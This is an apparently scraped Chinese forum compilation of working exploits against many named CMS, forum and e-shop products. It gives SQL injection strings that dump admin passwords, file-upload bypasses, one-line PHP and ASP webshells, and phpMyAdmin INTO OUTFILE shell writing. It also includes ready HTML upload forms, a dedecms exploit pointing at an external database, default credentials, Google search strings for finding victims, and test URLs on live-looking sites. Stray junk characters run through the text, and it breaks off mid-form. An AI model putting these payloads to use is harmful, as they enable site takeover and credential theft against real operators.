启航企业建站系统 cookie注入漏洞通杀所有版本
1 a' h9 g+ ^, d B7 s0 q; K1 w l/ b& ~, q
直接上exploit:" r, }/ A5 H" H# {4 G5 H
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
( c, H$ r: o1 _4 f, ]6 q- Q- \3 dtest:http://www.tb11.net/system/xitong/shownews.asp?id=210
- n2 F5 d% \+ A9 b- _--------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ B5 n% O4 C% f9 @ Q8 d4 N
Asprain论坛 注册用户 上传图片就可拿到webshell
2 m/ v& E- g a0 O* U. s
# `) F: I# v/ NAsprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。3 P, Y) r* ^) s
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>3 w$ r0 E f( a
2.gif 为一小图片文件,一定要小,比如qq表情图片5 h o1 x% o" [" ]
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
8 B% f9 A$ Z: d( _$ ~4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了; v* [, P; W" x4 A1 C/ z9 _/ d
5.q.asp;.gif
4 R; ~% w9 R5 ?5 s9 J6 w! x5 Ugoogle:Powered by Asprain# t6 {4 \# T0 s+ _
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ m, K+ s4 h- `# M8 ? F8 \' s
- ]2 p+ j% \0 P; ~) @) JShopNum1全部系统存在上传漏洞。
/ j% i- `! Z2 U1 A; R9 }& c' D0 L, X1 r% ^3 X
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
; t& [' @& p6 H按说明 提示登录后台。。
/ ]5 m' F* b( T8 Z: \4 W. x {1 _" c$ G在后台功能页面->附件管理->附件列表2 ~; k" Z& O* ]* y/ N8 w
可以直接上传.aspx 后缀木马! c$ N( V" F7 N( l
http://demo.shopnum1.com/upload/20110720083822500.aspx
8 K7 ?$ p% t. p& S3 g' C--------------------------------------------------------------------------------------------------------------------------------------------------------------------------% [* Y! O) i2 {5 {- D7 V
. L( }$ b! Q9 n1 G- d; ~/ `7 L
牛牛CMS中小企业网站管理系统 上传漏洞 D) e: C3 P B! @. J- s
* M$ A0 z6 k+ `! k牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
: b8 `8 }5 \& m" K- i) o后台:admin/login.asp
- _0 t: y! z3 \" yewebeditor 5.5 Nday; w: I/ @% z0 [2 g0 G$ J
exp:
4 r0 \- V" W; z- I<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?1 @. L7 P6 ^3 h
<input?type=file?name=uploadfile?size=100><br><br>?
" i' u1 ~8 ?2 b<input?type=submit?value=upload>?7 ~4 E% f- y+ N. m' g
</form>2 c& q: k) z, q, e
ps:先上传小马.8 \( o& D* D8 i2 `9 F9 S: [
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏9 b& z6 v8 }7 ^1 Y
! c7 V/ e4 U0 D
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 A" s9 m6 P% D) Z8 A% R- X
$ R6 Z7 x4 ~- Y FYothCMS 遍历目录漏洞
( h$ T) x2 M* s( F0 v. ~" U' E( o( [& c: a3 @
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。; B* i. i# ?# s* c- M
默认后台:admin/login.asp
# y' y! Z& n: C' g( t% N( s遍历目录:
/ ^0 G4 ?; @7 F' i% Z1 D3 R" ?ewebeditor/manage/upload.asp?id=1&dir=../
4 \) K, C" y/ M* f1 Q; Vdata:' \6 v: u. c# c, E4 G
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
4 p1 ?% N/ i/ h$ G$ {0 `--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 `* \6 e. D, k# C2 A( T) K' r% E+ r: s7 C }1 d& P$ z
Net112企业建站系统 1.0
6 e+ l9 \4 m3 t9 D+ X% J9 c% i
; ]' E( P- ^9 G$ p4 D% Y% c源码简介:0 g- Y7 {7 k7 l* }3 H
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。+ z; v' Z; _: K% t' w. t; V
添加管理员:" y9 @; S. n/ i3 b# t1 s) r% v
http://www.0855.tv/admin/admin.asp?action=add&level=2
' e0 T u" P2 A1 K: ?- Z- K# A* N其实加不加都不是很重要,后台文件都没怎么作验证。
+ i: n' |7 p q- {; {上传路径:. y! X( l% _" a8 l7 b
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200$ v& v3 K) b7 ]+ m# H
http://www.0855.tv/inc/Upfile.asp?Stype=2
7 ]7 j% D/ M) u8 R8 \' L+ a怎么利用自己研究。: x+ s- X) T0 d% w2 W: _9 Z
遍历目录:
0 G' d0 b* G* p" ? Vhttp://www.0855.tv/admin/upfile.asp?path=../..
6 m6 L1 s9 A' N( q+ @如:' g, ^3 I# v9 e |8 f0 O
http://www.0855.tv/admin/upfile.asp?path=../admin% j# ^ `5 }. }2 e6 Z5 M6 w. `
http://www.0855.tv/admin/upfile.asp?path=../data
C9 i; t, n1 l8 g1 o--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 n/ s2 [1 T8 A" E2 J! ]$ v: ]4 a7 R' y2 Q+ Q; m. T- G6 j
易和阳光购物商城通杀 上传漏洞3 m, Y9 O' x) p2 v7 m
9 M# \+ _3 p& h, ^2 }$ N- S
前提要求是IIS6.0+asp坏境。
7 L( Q% X1 u: `9 r漏洞文件Iheeo_upfile.asp
$ r' d" X8 X1 U; Z. E, F过滤不严.直接可以iis6.0上传& `$ r2 y) r$ s. a9 A5 a% S
把ASP木马改成0855.asp;1.gif( i, j% ], p8 e. w
直接放到明小子上传
. a# l, |* m4 v4 K1 l/ m8 rGoogle搜索:inurl:product.asp?Iheeoid=
& t$ H# |: }5 k/ h. r7 j' a--------------------------------------------------------------------------------------------------------------------------------------------------------------------------. W4 i; D9 T% [! a! w6 |( K/ l
* Y$ m% |, a4 ?
phpmyadmin后台4种拿shell方法" o! [- |: q8 H& q
% x$ M" P ]5 z- a* G
方法一:; H! _1 R& C' _; ^# R
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );0 |- [" _+ J1 i! P( t( W* y+ ^
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');8 Q: S: D6 o3 P" m2 {0 l
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';" g5 S* U8 m0 w* {) R
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
& n' A8 F2 F) F9 Q一句话连接密码:xiaoma
9 ^+ T6 X1 @' Q7 X% E! J方法二:. b; Y+ M' C' c/ T; C$ e# B5 z, I5 m
Create TABLE xiaoma (xiaoma1 text NOT NULL);
4 J r. A$ ^) d& [! yInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');/ `( w. U: r, F# _. P/ `- f
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
6 X# e& V5 a+ X! b) `+ S5 YDrop TABLE IF EXISTS xiaoma;
, l- h" |9 _, K" E) Q1 Q方法三:6 L# G- M8 u' F/ t
读取文件内容: select load_file('E:/xamp/www/s.php');
- ?+ T6 s2 Y( n* h& Q3 E) n% g写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'" |8 r7 a# P- S H4 Q
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'1 ?+ F ~. {% a( r
方法四:5 G" ^) N% p3 S; ?2 o4 G- \
select load_file('E:/xamp/www/xiaoma.php');' s& M5 B3 p6 y; ~% s1 }
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
. E- u% @& Y% a) ]然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir2 y7 ^8 J2 n8 X$ X2 Y$ Y
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 f- m( g0 k" u( X( M! s
4 k0 _' d( ~) r3 d- Y7 T传信网络独立开发网站源码0day漏洞
7 e! u1 |4 }# l2 `6 T% C- n9 \0 j$ B. b J
后台system/login.asp, S& y4 H7 I2 H) f$ B6 J7 A6 A6 G# s
进了后台有个ewebeditor
- O% O" d/ l9 o# J, Z# XGoogle 搜索inurl:product1.asp?tyc=
& o5 |0 K: Z3 H) E. \, [7 E( `# `编辑器漏洞默认后台ubbcode/admin_login.asp$ r- L! ]/ }0 W) d/ s1 O, y
数据库ubbcode/db/ewebeditor.mdb. `% R: m- N; W- e
默认账号密码yzm 1111119 ~' J0 c: F) n! }$ T
0 l+ r4 S- W m5 q4 A# W拿webshell方法
V/ [+ X8 g. M$ P% Q5 X登陆后台点击“样式管理”-选择新增样式
8 `" X) K W/ V; W0 l& }. s9 c样式名称:scriptkiddies 随便写
' ? D& D9 F d+ S. T* H6 ]# S0 b路径模式:选择绝对路径
' p9 ~8 {- r9 a2 `图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
D/ Y/ ~1 N+ W$ T- D& m图片类型比如就是我们要上传的ASP木马格式
8 _4 P( `6 t* h6 f上传路径:/
( \. Z! \7 `- b" W# ?' G4 F图片限制:写上1000 免的上不了我们的asp木马5 J6 T) C2 d' _7 ]1 G
上传内容不要写; R4 X E# d( g+ Z8 d+ B
可以提交了 0 q+ s' x# e- O8 a q
样式增加成功! 7 A! y5 W; G# }
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 5 {+ [9 J) p8 @2 d: H
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
8 o: L: P7 I5 X P& j2 r0 O2 O网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
- x4 w" r7 l- l. v1 l3 h1 k# P上ASP木马 回车 等到路径4 Y( ` U9 f: p8 }1 O- I
, {7 s( @: _/ ?( I; U: ]后台:system/login.asp7 T' f4 X- L' b- G! t0 X4 v/ Y& y/ n( c
Exp:
6 x8 G# `1 J' b% yand 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
( j/ Y7 z2 m9 o# b) E测试:
) l# F* o7 ^+ ^. ihttp://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
0 h# S: A7 Q; P# A) Ehttp://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master) t# e6 j. c' h1 Q3 F/ {6 P
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ d9 @: B u5 ^. k# Q, F$ _0 T
8 ?* c5 h9 R2 {$ m. f, X0 j* Y( Vfoosun 0day 最新注入漏洞
2 }4 _ a4 ]% {2 L$ O" }* c# f5 k$ k
漏洞文件:www.xxx.com/user/SetNextOptions.asp' |. e4 G3 t" g/ @3 c1 y$ e
利用简单的方法:
/ b. `+ y, g4 J" a- t暴管理员帐号:
# a7 m; B4 H! e- Nhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
" M) M |8 V3 g+ w/ q2 M" z暴管理员密码:! [+ [/ E, G6 v; h& g+ n4 y
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
$ x- N. w, E2 O# M& ^--------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 d A( c2 ?4 o! x
) j5 S2 x" ~8 P& W, Y }1 t/ o
网站程序的版权未知!! ~$ i# u7 `- E# `. ?8 M3 G
+ o# L3 v6 e0 {) q默认网站数据库:
- F4 ]: T" Y7 U3 a% hwww.i0day.com/data/nxnews.mdb$ C4 i# O7 g, ^
ewebeditor 在线编辑器:
) e8 F) i3 o) b7 f5 l2 o! l% ]' R编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
$ P5 o$ K) r6 R H/ x登录地址:ewebeditor/admin_login.asp' c; E4 f, W1 {3 O
默认密码:admin admin' T' J, o; E' i
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
4 }3 ^% f5 E; p( A+ u* H1 d, S$ Y2 p# D5 P0 H+ l: p3 X
Sql注入漏洞:
% H# ? H0 [/ Q& c+ ehttp://www.i0day.com/detail.asp?id=12/ F3 `( Q$ O- q6 V
exp:
% y: S/ o) Z+ y, E) Punion select 1,admin,password,4,5,6,7,8 from admin4 b9 O A% u- f6 v& M$ N ]
爆出明文帐号/密码
7 }! C3 @& ?, O/ z- U a* S
* ?+ s( u- R# i8 c. @上传漏洞:
" I. {' z$ ^$ a3 n* F后台+upfile.asp' p# c& q, ^! H7 x# D8 t7 U4 p3 j7 C
如:/ F- V, `7 P. ?6 D
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。% n" ?3 [) }. a0 R# T" _
shell的地址:网址+后台+成功上传的马# G2 p0 h7 \' e! \4 N/ f
google:inurl:news.asp?lanmuName=
1 N/ `6 b( ]# z. t. q------------------------------------------------------------------------------------------------------------------------------------------------------------------------% l7 v' N' J/ D4 d @
8 t; y- B4 m5 ~+ p/ B& S3 S
dedecms最新0day利用不进后台直接拿WEBSHELL3 y, y& a; M0 N& n; K3 [
* M0 C( G6 @& i0 P% R( N
拿webshell的方法如下:
7 q9 D9 @8 _1 D7 u0 @4 \* C. j网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.1 K, ~! {( E# \& d( P- U- C
前题条件,必须准备好自己的dede数据库,然后插入数据:. N! }; t. d/ m6 h- Z' t! P: @
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
& |5 Y9 @1 ~: i! F! U# H$ n7 r+ x3 |( a- M; j0 S2 \1 U
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。# {1 I3 ` o! \
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
C, F- D+ R' v, g" d: M: y, @+ Z<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />' o6 J& m9 a) V* l( H6 L2 Z2 w
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
& k: Y: w% L* z: B<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
+ M( |; W" J1 J. X<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
3 U, F- [' C$ a5 u0 K7 u- i8 X<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />8 V$ g9 |) R0 y3 }4 I3 s4 t
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />1 a% Q4 d X$ b z& G8 ~( S
<input type="text" value="true" name="nocache" style="width:400">1 {/ p( ^. \* w" p
<input type="submit" value="提交" name="QuickSearchBtn"><br />
8 y% J0 [) x1 o4 C$ V, O' }</form>
; ?+ ?* c6 O0 q9 h: [<script>( r' f- }7 K0 ?& _; W4 [
function addaction()
; b) v( X: g; W4 }+ d7 N{, x v3 P9 W9 z" B2 V' @
document.QuickSearch.action=document.QuickSearch.doaction.value;
\' a7 A5 J/ }3 p& i}
; T9 V: V+ W$ @, Z% w% W- z! n</script>1 n' y% H' E1 Y
-----------------------------------------------------------------------------------------------------------------------------------------------' F- A8 I, [# E& F
+ Z$ z# h. Z9 \dedecms织梦暴最新严重0day漏洞
: q( c1 n$ O9 `% ubug被利用步骤如下:
# Z- G1 ]" S& j; whttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
k2 _2 J3 o+ Q' M3 E0 |* t把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
% O% F9 R+ H/ B; j8 p( C-------------------------------------------------------------------------------------------------------------------------------------------, ]* v6 u. y2 [; `- P
Z1 p/ X u7 j4 r" S多多淘宝客程序上传漏洞 * h. O$ V1 ?2 {
漏洞页面:" p" X+ q# n& Y% a
admin\upload_pic.php: p) O0 r2 N: i! L
传送门:
6 @5 t8 O' t- ~* t- r) Chttp://www.www.com/admin/upload_pic.php?uploadtext=slide1) s7 i' V' l9 m0 c2 A
PS:copy张图片马 直接 xxx.php 上传抓包地址!
+ i$ \% A) n0 @& ` N8 X4 {------------------------------------------------------------------------------------------------------------------------------------------------------( m0 k1 m! |8 x5 N- m h9 ~1 A9 W
2 r$ h/ m: Z D4 o" ~无忧公司系统ASP专业版后台上传漏洞
: r$ F2 N7 M( g g8 r( _漏洞文件 后台上传
! q N, d( j" G5 w6 P: padmin/uploadPic.asp' E+ C) w$ r) y ~" i# ]
漏洞利用 这个漏洞好像是雷池的
: F F, J5 L3 P! Y x( ehttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
! \9 Q/ f& L K2 o7 o等到的webshell路径:
* Y- {: i( v, T/UploadFiles/scriptkiddies.asp;_2.gif
4 b( _- A. {# q, s/ r---------------------------------------------------------------------------------------------------------------------------------------------------
8 j( a( k& H' Q+ E" S2 e2 _# } c% M: \
住哪酒店分销联盟系统2010
& X2 l7 f% H5 _# a/ USearch:2 M+ T" D1 u% ?9 H7 r$ _
inurl:index.php?m=hotelinfo$ w+ N$ f$ `- b7 d6 l9 @' b) |
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
# m5 s7 K' C) }0 S/ s默认后台:index.php?m=admin/login k+ f5 Q( E, G0 A
--------------------------------------------------------------------------------------------------------------------------------------------------3 _/ O- K( V K2 e `1 ]6 }
. p4 g# W% v3 N5 `. V0 Linurl:info_Print.asp?ArticleID=7 c* u% E- f: U% `. S7 j8 n+ F
后台 ad_login.asp
* J( y0 Z4 G' f, A爆管理员密码:8 Z% J, l& n4 w1 b% W
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin' J3 J; o; e- a
------------------------------------------------------------------------------------------------------------------------------------------------------------0 D. b8 u, o- E* g* R
( p" P5 k9 j+ a* ?+ L搜索框漏洞!
( _6 e5 I" C# _; _8 o: O1 U%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='; W4 `6 R3 @; \! _- R
--------------------------------------------------------------------------------------------------------------------------------------------------------
$ [0 h8 b/ J. K; t, t. m! x
3 s8 e3 R5 J7 i- T关键字:
4 `5 i' L. \8 S: c6 yinurl:/reg_TemletSel.asp?step=2- l9 ^: x. l/ k0 V1 N9 F
或者% c& H! j: F% p& {
电子商务自助建站--您理想的助手
2 Y9 ]1 p2 `) v4 z3 z4 d$ S-------------------------------------------------------------------------------------------------------------------------------------------------7 M! N Q/ Q% I S( w2 `- \8 L
0 v( u2 P; c& k$ r' W5 }
iGiveTest 2.1.0注入漏洞8 E% {- F9 F' J, X
Version: <= 2.1.0& p( v8 ~$ W7 u. \! L
# Homepage: http://iGiveTest.com/) h- d4 k& P: \: `% D& ]6 V: Z
谷歌关键字: “Powered by iGiveTest”
1 t% p a0 q; X, E随便注册一个帐号。然后暴管理员帐号和密码
/ U6 n2 B1 l, z+ \* T/ Ohttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
! d* S% O* q4 X2 K+ w------------------------------------------------------------------------------------------------------------------------------------------------6 R; O- m, h; Y1 @
1 j% _& a& r2 h& P2 Z
CKXP网上书店注入漏洞
9 x) j' C$ M9 O4 D K) Y工具加表:shop_admin 加字段:admin1 k# |3 m/ o, v
后台:admin/login.asp
0 m5 s& e$ e* [. W5 X登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
- |6 w3 S- x/ B7 }) _inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息% P, v' [& X- W8 `* h
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ I; U K5 W+ P, ~1 H" b; h, z- k! z7 f% b9 c8 p' [5 b
段富超个人网站系统留言本写马漏洞1 k. g) q O. C/ x/ V4 k% C. u. ]
源码下载:http://www.mycodes.net/24/2149.htm0 e3 j3 }! a/ _! d5 c
addgbook.asp 提交一句话。4 M/ Q9 Z6 \# `: P0 f7 f' |
连接: http://www.xxxx.tv/date/date3f.asp m: ^: [4 @- E+ c. ~% N
google:为防批量,特略!. G1 E: E* |1 G, S* }
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 l: Q2 u; Y/ ~: }( G
$ M5 E$ K5 N4 s2 I9 \. J1 F- }
智有道专业旅游系统v1.0 注入及列目录漏洞
2 l4 n P/ r# ]& Y- D, J默认后台路径:/admin/login.asp
: L2 N$ g) `) `0 _$ W- m# [默认管理员:admin
: @. y: q9 ^2 e# P& \默认密码:1234562 @* s) P7 \3 b
SQL EXP Tset:
5 M2 K6 _! Q: n8 a% o) Ihttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
; B4 ?. F2 O0 h- T------------------------------------------------------------------------------------------------------------------------------------------------------------------------9 x$ b9 V0 i$ v, w$ n) P
6 a3 j$ r! p6 L( {% w1 o
ewebeditor(PHP) Ver 3.8 本任意文件上传0day, N& k- Y; _0 Z Q/ I) ~' i
EXP:9 V9 N( k8 e5 v6 F8 t6 Q5 ^* q: G1 F
<title>eWebeditoR3.8 for php任意文件上EXP</title>
4 q/ @6 H/ S# G9 M<form action="" method=post enctype="multip6 G+ K: J$ C4 e' `# a4 L
art/form-data">
1 |6 O) l5 W! v. S _<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
% V2 `7 G' M6 rURL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br> * ]$ y/ p. l* l# A; c. h
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> - Y+ M! S* H8 s, _4 s% l9 o8 ?7 j, u
file:<input type=file name="uploadfile"><br>
1 c3 S& c4 J' E. h' T<input type=button value=submit onclick=fsubmit()>
. q8 v7 A. m' N7 W t2 ^, b</form><br>
8 _, Y; {; u% J+ Z) u% J<script>
0 m/ x) Z& m* m$ }! \( P/ dfunction fsubmit(){ - \5 f0 z0 d4 ]9 ~. |
form = document.forms[0];
, i" T% v8 W( R Oform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
2 A2 s$ ^, K; A. E. Dalert(form.action); ) a8 y; D; s9 d
form.submit(); ' }* J+ {: p( {6 S" P1 D* Y" x$ t2 q
}
7 L$ B. @% H9 @8 G# j</script>
. q* {% T8 A6 f! K& k" e5 o$ V( U注意修改里面ewebeditor的名称还有路径。& y8 q& i! J' T# M: @# k
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ D* r! [, B. Q% q: G
$ L6 Q0 }4 ` L! @提交’时提示ip被记录 防注入系统的利用
" ^8 F3 s$ |+ G7 @' h+ b网址:http://www.xxx.com/newslist.asp?id=122′: U3 f! L+ K: s+ }& o
提示“你的操作已被记录!”等信息。
! Z; V% I5 S% C$ A, b8 {, R) e利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。3 {) G( J# q/ I2 u- c/ T( C4 g( A
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 b& ?) Y* J f7 u
# }+ ^+ v% l7 K6 r西部商务网站管理系统 批量拿shell-0day9 x% F9 r4 O" ~! i
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb * p; |+ t5 n/ v: V
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
7 c. x9 Q. J1 r+ S( l2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
7 y. ^# B( Z) b7 N$ L# O3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
# }" C, }0 @: n+ p---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. k9 j" E) }! g2 {/ z# M- w0 M* ^. ]. Y: t
JspRun!6.0 论坛管理后台注入漏洞
% X4 x' Q% k( j) U& _! a: u/ w. s5 b$ z. p' [4 E
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:; z, m& I# n2 T5 q
JspRun!6.0
$ Q0 m$ Q3 H s: K/ w" P L k漏洞描述:! W ^% M) W6 k. u- a
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
$ _! y* K8 O; M3 ^ k在处理后台提交的文件中ForumManageAction.java第1940行
; r+ l K4 k, G) F7 s- W4 q8 zString export = request.getParameter("export");//直接获取,没有安全过滤
0 t! I5 Y- J1 m+ R3 b# N( H( xif(export!=null){5 ` [% Q8 s3 Y, P& C H; b5 Q
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...$ m" e$ d- y B# j1 k8 B
if(styles==null||styles.size()==0){8 t3 H% ?8 y( W7 g* s# D
<*参考/ X. Y A: u" U- |6 E* p
nuanfan@gmail.com& @7 n0 G5 y" u3 K0 I% i
*> SEBUG安全建议:/ R5 ]+ t4 I3 z/ E; r
www.jsprun.net
3 n+ s# @1 ?3 Y% ?' B$ F(1)安全过滤变量export0 @- G2 \4 Q: f- ~ t/ F( x. o# {
(2)在查询语句中使用占位符
; F# p3 W- a; t5 ~3 q! f) ?/ h------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 q9 @" i9 V* g0 Y
h/ {1 V& h: h6 }9 E8 S. j乌邦图企业网站系统 cookies 注入# F/ q& U/ A& r5 Q. v
+ z: v- y! y7 A! P; f0 V: z& S9 m
程序完整登陆后台:/admin/login.asp
/ p) n% g# l# |2 A @默认登陆帐号:admin 密码:admin888
9 }& z4 Y7 x `! c9 ?2 o语句:(前面加个空格)6 o3 y8 s. v ^# Q3 L
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
/ \5 k( ?$ h# {1 {3 @* {1 t或者是16个字段:
* M/ j- j' t1 n: Z# cand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin! I h( C d7 a2 k: A/ v5 {
爆不出来自己猜字段。
- j1 j: \$ z7 [. s注入点:http://www.untnt.com/shownews.asp?=88
& U# j- J6 W8 z) W) }getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
0 M# v) H, A# G0 ]关键字:
7 m* \, P3 P( vinurl:shownews?asp.id=
8 U6 Q0 M1 m! t6 u: y-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 J" k9 W& I4 p; Z7 I
- f3 e+ z* L; S( q8 xCKXP网上书店注入漏洞9 Y+ Q7 \$ y: ^, a
9 H6 q9 D" u6 {' z3 Q4 G工具加表:shop_admin 加字段:admin9 j) t1 k: r* U; P
后台:admin/login.asp
6 W. P. {0 E! s h登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
% S% \1 V, q+ O, J* P6 t- ~8 u9 }inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息1 S* f# E( j( f. `# l
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( F; s6 N' q& J6 L' s9 ]
& E) m% I* X8 [ ZYxShop易想购物商城4.7.1版本任意文件上传漏洞
, @% ~. e. I @7 ], e- Z& O# F1 g8 q9 K
http://xxoo.com/controls/fckedit ... aspx/connector.aspx9 W8 B2 m& \/ Z& e
跳转到网站根目录上传任意文件。, Y( \' [7 a7 q1 O
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
) F" E; y4 E: W. X1 D0 W<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
